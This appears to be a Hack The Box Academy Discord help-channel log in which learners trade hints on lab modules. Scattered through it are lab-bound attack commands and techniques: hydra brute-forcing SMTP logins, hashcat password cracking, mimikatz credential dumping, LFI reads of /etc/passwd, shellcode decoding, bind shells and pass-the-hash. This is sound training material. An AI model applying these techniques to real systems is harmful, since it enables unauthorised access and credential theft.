yeah, the first time I did 4444 it just said tcp connection successful but got no shell... tried a diff port and got the perm denied, tried 4444 again and we're good
could've been an error I did idk, but it worked lol
And I assume if I disconnect from the bind shell, I would then have to run the syntax again on the target to re-open the shell?
idr
alright no worries, thanks for the help though, I'm off to bed, goodnight!
is it just me or do a lot of the questions in htb modules require information from modules you haven't done yet
ya im trying to download a .exe from my machine to the target and I get a 200 on my machine but it never downloads to the target
windows doesn't like when you don't use -OutFile or whatever it is in Powershell
nothing works isn't particularly descriptive, if you're on the free plan and using the pwnbox then you're gonna be restricted on the internet
i'm on a student plan and i'm not even using the pwnbox i'm just using a terminal
Hi i have a question
also i'm not looking for help with the question i just want to know if i'm the only one
ok ill look into that thanks
do any of you know how to de code messages?
could you be more specific
you mean like this💀 SW4gdGh1IhdvcmxkJ3Mgy29yzswgysbnbG10Y2ggdW5mdXJscywKU3B1YwsgbxkgbmFtZswgdGh1iG9uZsb1bnNhaWqsCkfuzcbmcm9tihrozsb2b2iklcbjihnoywxsigj1igx1zc4kq29sbgvjdcbtzswgyw5kihnoyxjoihroaxmgd29yb29ybgqncybmywxslg==
it's base64
what does this have to do with htb modules
why are you asking in this server in this channel
bc i cant talk in gen
this is a channel dedicated to questions about the academy, a place for education.. not random stuff like that
then why the fuck are you in it and why are you asking here
BC IDK WHERE TOO
try /r/masterhacker
don't
no one here can help you with that, we've said that in other ways
where did you get it from? it decodes to a bunch of non unicode characters
it looks like it's supposed to be a poem but half of it is unknown characters
it was given to me to try and de code first person to gets something
so what is the code you found?
omfg man
the code is: go away
i would say take the hint but i've literally told you directly to go away
read and follow #welcome
ok this is absolutely killing me
what is
break down the commands one by one; add each | one at a time until you see why it's not working
ah
the curl inlanefreight.com and find unique paths
i'm not asking for help with the problem, all i'm asking is if it's just me
to be fair that question is a bit out of the left field
this module doesn't even cover curl
well if you break down the command, you'll see where it's breaking
that's still not what i'm asking
it sort of does, but curl is also just a basic linux command
like yes the linux module is out of order imo
good to know, thank you
but not much that can't be googled or read ahead and circle back
might do web requests and/or intro to networking before this one since i'm on the infosec foundations path
i mean i've gone as far as to google the actual question and i've found three completely different answers, none of which were correct
so i'm just going to read ahead
try chatgpt
well if none of the results are correct; then I suggest breaking down where it's breaking down to try and figure out what breaks and where
chatgpt is worthless
if it's giving you no answer or too high/low
its only as good as its user
i asked it a basic question about tr the other day and it kept giving me some completely made up answers
my suggestion was moreso: you said "not working" earlier
it's most definitely not lol, you just have to ask the right questions
the curl question is a bit unfair but it's asking you to chain commands together using the pipe operator
tr is used in a lot of things; tr can be used in html
and is a linux command
hold on let me find it
it can only pull so much
nvm it's gone
but it kept trying to tell me the ascii value for - is between N and M or something completely wrong like that
and every time i corrected it it just gave me a different completely wrong answer
is it between N and M
no it's not
it's nowhere near the latin alphabet, which starts at 65 iirc
what
sounds like you asked it a bad question
i guess since the courses don't work, google doesn't work, and chatgpt doesn't work, you'll never learn about curl.
symbols are before the alphabet
that's what i just said, dash is 45 and the alphabet starts at 65 but chatgpt kept trying to tell me that dash is in the middle of the alphabet
did you read the question that i asked in the first place
why does everyone on discord constantly misinterpret, ignore, or selectively read every fucking question i ask
my original question had nothing to do with curl, all i wanted to know is if i was right about htb module questions containing information from future modules
completely ignore the part about curl, pretend i never even mentioned curl
the answer is: no. i have never seen a module not teach you how to complete it. some of them have requirements of certain knowledge before you'll be able to comfortably go through the module, for example it may expect you to know basic linux commands like "dir" and "curl"
if "everyone" does it, maybe you're bad at asking specific question to get the answer you want
and relax, being mad at other people won't help you get better answers or make people want to answer them
idk how much better at asking questions i could possibly get when i ask stuff like "which of the two is better, x or y" and every fuckin person answers something other than x or y
Late to the party, but to answer your original question @loud dagger, I found the same specifically to that exercise. I found I had to lean on prior Linux knowledge to answer it. I then scrolled back through the module to make sure I hadn’t just missed it, but couldn’t see it there. And then I would have been able to piece the answer together with stuff that came later on.
thank you
using one of the commands i found in the forums gave me the expected answer
so idk how you're not getting the expected answer
would you pretty pretty please ignore the other messages i sent; they have nothing to do with my original question, all i was doing was giving an example
they're gone, i deleted them, they were just an example
cool
joe answered my question, thank you joe
thank you
i'm just commenting on the fact that in your original post you said you used a handful and didn't get the right answer. I apologize for dragging it out further than that
unbelievable
yes, you'll eventually need all the things you learn for the last module on the path
I'm still totally stuck on Intro to Assembly Language Skill Assessment.
I don't understand what the question want's as an answer. Am I looking for a flag???
Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.
the elf program contains a shellcode which has been xor'd, your task is to decrypt the shellcode and run it to get the flag, to do that, you'll need to disassemble the binary and reverse the encryption with the xor key found inside
I have xord every single stack value against the key in search of something that looks meaningful. I dont see anything that looks like a flag.
because it's shellcode, after you xor it, run it with the shellcode loader to get the flag
is the answer an address?? an HTB{flag} I just don't even know what we're looking for for an answer here at this point
it's a normal flag, you'll know when you see it
disassembling and writing shellcode, fun times
I'm really trying everything here. I just went so far as to try changing the endianness of every hex value.
hello may i have some help with the lfi module
there's no need for that, send a screenshot of your gdb and tell me where you're getting the value
you'll need to get verified to post images, read #welcome
stuck at the basic bypasses question, even tho i was able to get the /etc/passwd , when i change it to /usr/share/flags/flag.txt i get nothing
am i missing something or is the flag path incorrect ?
did the question tell you to look for flag.txt specifically?
so why /usr/share/flags/flag.txt instead of /flag.txt
i did try that and still no results, also the usr share flags was the path from the previous question
actually nvm i tried again and it worked now?
thanks!!
you were giving me a heart attack
I've gone through it about 12 times. My method has changed slightly each time, but the most recent run through was...
./shellcoder.sh loaded_shellcode
gdb ./loaded_shellcode
break *0x0000000000401000
run
x/16gx $rsp
info registers rbx
set $rbx=0x2144d2144d2144d2
python print("0x%x" % (0x[every address] ^ 0x2144d2144d2144d2))
Get array of 14? hex values.
Concatenated all hex values.
python loader.py '[that concatenated value]'
Then I tried reversing the endianness of every one of those hex values before concatenating them. and running the loader.py again, but it didn't yield anything.
lab down?
did you xor it?
Just ask your question and usually someone will reply
python print("0x%x" % (0x[every address] ^ 0x2144d2144d2144d2)) is where I xord every address against the key
the question asked you to use assembly to xor it, not sure why you're using python
and did you follow my hint and the hint in the question
also, you're xor'ing the address? you'll need to xor the value that was pushed into the stack, instead of the address
Ohhhh kay I am mad. I don't know what I did wrong.
One of my xor's produced a result that had 15 instead of 16 characters. I found a forum post where someone had the same problem https://forum.hackthebox.com/t/htb-academy-intro-to-assembly-language-skills-assessment-task-1/4164/30
Not sure what both of us did wrong to get that
but my list of xor'd stack addresses against the xor key produced one that was missing a leading 0.
adding the 0 produced the flag.
I truly hope I did something wrong. Because I'm.... not happy.
😦 anyways. I got it. Thanks for your help @next bronze
anyone having a difficult time spawning their target?
Try changing VPN?
Same as above
got it, thanks
Can someone suggest me a good resource for the computer networking?
why cant i dump hash with mimikatz? ive tried sam cache and all possible lsadump command
in section Pass the Hash (PtH)
I’m still lost in HTB footprinting with hashcat
My hashcat status is EXHAUSTED
What am I supposed to do.
what section of footprinting is hashcat
In ipmi
The last question “what is the cleartext account password
My commands are “hashcat -a 0 -m 100 hashes.txt /usr/share/wordlists/rockyou.txt
Did you try the passwd list that the module says to use, ipmi_passwords.txt?
yeah if it's exhausted that means it went through the whole list and found no matches
What mimi commands?
so another wordlist is good to try
I use that one and says EXHAUSTED
lsadump::sam
i haven't done that module so i can't really comment, not sure. exhausted simply means no password matched though.
ive nt acc and i run mimi as admin already
use rockyou
I’m doing it , but say’s exhausted
would hashcat return exhausted if the hash was incompatible with the mode though?
i thought it errored out
I do not think so, and I’m sure that the mode I need to use is the 100
With 7300 is not giving anything
Wooooowwwww I got it
Yesssssssss
🤣🤣🤣🤣🤣 FINALLY AFTER TWO DAYS
That's not correct, you'll want to use a completely different command and make sure you elevate your token
ermmmm
Been trying to think of a hint without just fully giving it away
are you supposed to dump sam or
My notes say password
yes is able to dump secrets using the elevated token method
but i cant dump the hash, imagine i got the clear txt password but not hash 
but we don't know which module is it
oh nvm I'm blind
how to dump hash lol, i tried lsadump:sam but it gave me other user hash
or should i just switch the plaintext pw to hash myself
this apex legends drama is wild
Has anyone else had issues with ZAP not replacing strings in the Web Proxy module? Burp seems to be working fine when using match&replace.
NT/rc4 off a full login from mimi will do it
||sekurlsa::|| is the first part
oh i use mimikatz to pth to the victim machine?
i see i thought ill need to login to the windows in order to run mimikatz
nope will try that method from gubarz later having class now
thanks all
yeah you'll need to get the hash before you can pass it
need some insight on https://academy.hackthebox.com/module/143/section/1265
I scan or capturing traffic with wireshark, it's asking for info on the target 172.16.5.5.. im simply not getting any connections there.. i do see that IP when I run fping
did you ssh into the target
you know how to filter by a specific ip in wireshark?
yeah ip.addr = = 172.16.5.5
if i ping the 5.5 i generate the traffic but its icmp it doesnt recover the common name
im guessing this isnt working as expected?
if you're trying to get the CN, you can use other tools
dig?
the most common scanning tool, it's also in the section
gotcha.. running that. I wish the wireshark thing worked.. unless its not meant to and eventually you need to run the scan
maybe the lab just doesn't have ARP request from DC, the lab is not always the exact same as the section
also yes I don't think you'll get the CN from the wireshark capture
This is a follow along section, you'll see they use fping to get a list of IPs which then you can use the next tool to get more information
while i was running the nmap scan, i dont know it triggered something or just coincidence but i did eventually get 1 piece of info from wire shark, protocol is "BROWSER" and in the info it says "Host Announcement ..." and it does the first part of the CN but not domain.
anyways, thanks guys i was able to complete the module
module?
me? i was working on https://academy.hackthebox.com/module/143/section/1265
Shush you! I meant section 😦
you need to verify your acc.
the instructions are here https://discord.com/channels/473760315293696010/477042232109826048
The part about Wireshark was to explain that you can gather some information over the wire and it's a great tool for sniffing, but it's not applicable in all situations.
understood, i think i prefer responder between the three shown, although i should use wireshark more since i have to use it at work
wait, how do I trust the link ?
how do I trust hackthebox ?
with my master password
I mean all are hackers here, I could be hacked
reach out to support
@soft cedar
true, you don't have to get verified 
means ?
reach out to support on the website
well what exactly would they do
or scroll your lazy ass up in discord yourself
By mistake I set my country as Afghanistan
it was set as default.
what do I do now ?
bruh not able to verify, someone please gimme access
I want to learn reverse engineering, bug, kernel exploiting, privilege escalation and dll injecting through process hacker asap
Guys who solved the perfection machine
vpn
The machine always returns 502 is that part of machine
Bruh follow the details in #welcome and you'll be able to verify your account
F 111019
3301
You'll have better luck in the correct channel #boxes this is for academy
I don't have access to it
Read #welcome and verify your account
ThNx bro
DETECTING WINDOWS ATTACKS WITH SPLUNK >Detecting Kerberoasting/AS-REProasting
can someone hint me for this.
Modify and employ the Splunk search provided at the "Detecting Kerberoasting - SPN Querying" part of this section on all ingested data (All time). Enter the name of the user who initiated the process that executed an LDAP query containing the "(&(samAccountType=805306368)(servicePrincipalName=)*" string at 2023-07-26 16:42:44 as your answer. Answer format: CORP_
Hey all, has anyone completed https://academy.hackthebox.com/module/54/section/490 ? I'm running the following ffuf command: ffuf -w SecLists/Discovery/Web-Content/burp-parameter-names.txt -u http://<IP>:<PORT>?FUZZ=key -fs xxx - but don't seem to be getting anything back. I tried a few of the larger wordlists but still nothing. Seems like it should be pretty straightforward, not sure what I'm missing.
Look at the last example in the section, it utilizes admin.academy.htb
Pass the Hash (PtH) section, i still dk how to get into DC01 machine or send payload to DC01, can someone help me
i mean DC01 is just smb right
get the hash from one of the machines you have admin on, then pth to dc01
the target can be "dc01" instead of ip address?
if the entry has been added to your hosts file, or it's in the dns record, yes
but its a smb inside a machine i suppose ... how is it possible to have individual ip address
I had tried adding the hostname to the /etc/hosts file for the generated IP but still having the same issue. Gave it another go just now and still have the same problem.
dc01 is the domain controller, there are a lot more services running than just smb. and either way, even if it's only smb, it still needs to have a network address so that it can be connected
smb inside the machine so it's the machine's ip
Don't forget to specify the port at the end, additionally, you need to play around with the size you are going to filter on
use what you have learned in footprinting and host discovery, there are a lot of ways
you know the subnet, scan it
Yeah, I tried with and without the port but still nothing. Probably some small error in the command, will play around with the filtering and params some more. Thanks @autumn pilot .
thank you so much
learnt alot
connected to the dc but shell wont come out 😭
isnt rdp session available?
if it's the last question in that section there are specific tools that need to be used
yes i followed the instructions already
the demo on htb actually got the shell after doing what i did
tried running the command again?
could you give me a hint plz?
HTTP ATTACKS
HTTP Response Splitting
solved
hint: You need to pay much attention to redirection and payloads.
First, try to exploit and get your cookie (set a test cookie) in the log, and then try using that payload for admin (also pay attention to the lab hint).
i am stuck at skill assessment 1 attacking common services, i found the username with smtp enum, but now i am not able to make any progress. could somebody give me a hint what service i have to attack next?
still cant after reset 😦
||ftp|| or try the creds with ||mysql||
Why do you want a listener there?
Module: NETWORK ENUMERATION WITH NMAP
Section: Firewall and IDS/IPS Evasion - Easy Lab
Question: Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer.
approach/solution i tried: sudo nmap -sV 10.129.226.86, i get the answer
i also tried nmap --script smb-os-discovery 10.129.226.86 , but by using this command i was not able to get the desired result, is there anyother way i can tried to get the OS version?
should i find the pw with hydra for the user i found and for the ftp service?
Does anyone have any idea why psgetsys.ps1 return this erorr "Exception calling "CreateProcessFromParent" with "3" argument(s): "Not all privileges or groups referenced are
assigned to the caller"
At C:\tools\psgetsys.ps1:175 char:1
- [MyProcess]::CreateProcessFromParent($ppid,$command,"$command $cmdarg ...
-
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : Win32Exception" ? 😄
yes bruteforce the password but target a different service
ls
Try a service that has something to do with emails ¯\_(ツ)_/¯
-V is sufficient; try and submit the flavor of OS from the results as the answer
haha that would be smtp. but there i found only the username but no pw.
Great, so bruteforce it w/ hydra.
HTB Module NETWORK ENUMERATION WITH NMAP walk through
Section: Firewall and IDS/IPS Evasion - Medium Lab
Question: After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
approach/solution i tried: $ sudo nmap -sSU -p 53 --script dns-nsid 10.129.226.86, not getting the desired answer, please let me know if i am doing something wrong
Nasir, those skills assessments are to practice the things taught in the modules. I see you asked about the easy lab 15 mins ago and medium lab now. I recommend you try some more things before asking for hints here
I’m trying to nc a internal DC
really i have done that several times nothing found and yet suddenly i found it. but i had before the same problem with smtp enum and i had to respawn the target did now the same...
what commands did you try ?
or it was because i used the wrong pw list. i found it now with the seclist.
this i tried:
hydra -l 'fiona@inlanefreight.htb' -P pw.txt smtp://10.129.7.109
hydra -l 'fiona' -P pw.txt smtp://10.129.7.109
and also with the rockyou list.
here the pw.txt are the passwords from the resources.
but anyway. thank you 🙂
found it with hydra
just spawned the instance and it is just like this
good to know😆
and yes, this is not intended
Ok I understand, I asked because some assessments / exercises require navigating to another directory.
it's the web proxy's skill assessment but the problem persists across any skill assessment
did you visit the endpoint mentioned in the first question
yes
and does it load, because I just tested it and it indeed does load
From the screenshots you are just visiting the IP of the target without specifying the php page
then wtf
I would be very grateful if someone give me a hint on the question from Suricata Rule Development Part 1 Section of the working with ids/ips module 🙂
Wrong place buddy #careers-and-certs maybe, but not here
Read and follow #welcome to access it
Linux Local Privilege Escalation - Skills Assessment
- any clue how can i find flag1
- I was able to capture flag 2 and 3
- I am now the user b
- now im trying to capture flag 4? already check the ports and there is a tomcat installed on the server there is also a user called tomcat while checking the /etc/passwd
can anyone send help?
Hi guys please I need your help. I just started my journey into cybersecurity and am using hack the box to get hands on. I have been able to pwn 3 machines but am stuck on the 4th, trying to scan using nmap but it keeps saying "seems host is down" but actually host is up cos I can ping it.
Please help
Might want to post your question in pwnbox to get a response, because this channel is for Academy modules.
Oh OK. Sorry about that. Thanks
For flag 1, it's a little bit hidden; you are on the right path for 4.
I've been brute-forcing something using msfconsole for a bit of time now.
No need to brute your way, what you seek is available
Module: ATTACKING ENTERPRISE NETWORKS
Topic: Lateral Movement
Question: Obtain the NTLMv2 password hash for the mpalledorous user and crack it to reveal the cleartext value. Submit the user's password as your answer.
Inveigh.ps1 runs on 172.16.8.50 (PowerShell runs with administrative privilege); I get no hash whatsoever after a long time. Do I need to invoke some behavior to force this user to broadcast traffic so Inveigh catches it?
#858470491676737536 would be the place for that
My bad, will post it there. Thanks
Hello, I need help with the last question. I've already found the hash in the keytab file in /etc, but I can't find a way to connect with it. I've used all sorts of tools like Impacket, win-rm invoke ... https://academy.hackthebox.com/module/147/section/1657
Did you do the steps in the "Impersonating a User with a keytab" part of the section? The part right below that shows how you can use smbclient to connect
Of course 🙂 but I don't understand why it says it's the wrong format.
Linux01$
Btw
The $ is important here
AFAIK at least
Also it could be the keytab you're using is expired
Still can't find any hint. I found 2 tomcat-users.xml files; one can be read by the b user, but the credentials are not working though.
Not sure why you are using Python, the area I mentioned is purely kinit and klist
OK, thanks.
For extracting the hash to test a PtH attack.
You don't need to do that
-k uses Kerberos auth, either the KRB5CCNAME environment variable or the loaded keytab file.
The one you want was the original file
Do I need to find another keytab specific to the linux01$ user? It doesn't seem to work.
Yeah, there's one specific to the user. It could be that the one you're loading is also expired.
There's a tool shown in the section for enumerating and finding keytab/ccache files
Yeah, /opt/linikatz.sh
It'll show you more than what you've manually found so far
Thanks a lot. In fact, I had already used the tool, but I had transferred it from my attacking machine to the target machine via nc and it didn't display as much information as it does now. I thank you for the help.
Hello everyone
I went through the page source manually and found nothing.
Any hints would be greatly appreciated. Also nothing in wpscan either, only mail-masta and contact-form-7.
You're going to need to go through a couple of different pages to find the plug-in
Just did the SIEM Fundamentals module... is there no explanation of the skill assessment answers? Or is it just you're right or you're wrong, good luck?
I've done that, that's how I found the flag.txt. Any other hints?
The skill assessments in general test your knowledge of the module as a whole
They provide the minimum info needed to point you in the right direction